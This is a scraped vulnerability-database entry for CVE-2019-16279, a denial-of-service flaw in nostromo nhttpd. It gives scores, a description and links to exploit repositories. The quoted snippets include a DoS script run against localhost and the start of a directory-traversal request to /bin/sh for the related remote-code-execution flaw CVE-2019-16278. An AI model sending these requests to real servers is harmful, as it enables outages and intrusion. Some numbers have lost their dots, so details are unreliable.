Published: 14/10/2019 Updated: 21/10/2019

CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10

CVSS v3 Base Score: 7.5 | Impact Score: 3.6 | Exploitability Score: 3.9

VMScore: 446

Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

A memory error in the function SSL_accept in nostromo nhttpd up to and including 1.9.6 allows an malicious user to trigger a denial of service via a crafted HTTP request.

Vulnerable Product	Search on Vulmon	Subscribe to Product
nazgul nostromo nhttpd

（CVE-2019-16279）dos

CVE-2019-16279 （CVE-2019-16279）dos This bug exploit a memory error when sending too many \r\n in a single connexion Example $ curl 127001:8080 HELLO! $ /CVE-2019-16279sh 127001 8080 $ curl 127001:8080 curl: (7) Failed to connect to 127001 port 8080: Connection refused

Directory transversal to remote code execution

Exploits for CVE-2019-16278 and CVE-2019-16279 Nostromo httpd is prone to 2 cricital vulnerabilities for versions <= 196 (0day =]) first one is an RCE through directory transversal, second one is a DoS CVE-2019-16278 - Directory transversal to remote code execution POST /%0d/%0d/%0d/%0d/bin/sh HTTP/10 Connection: close User-Agent: Mozilla/50 (Windows NT 1

CWE-22 http://www.nazgul.ch/dev/nostromo_cl.txt https://git.sp0re.sh/sp0re/Nhttpd-exploits https://sp0re.sh https://nvd.nist.gov https://github.com/ianxtianxt/CVE-2019-16279

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2019-16279

Vulnerability Summary

Vulnerability Trend

Github Repositories

References

Vulmon Search

About

Products

Connect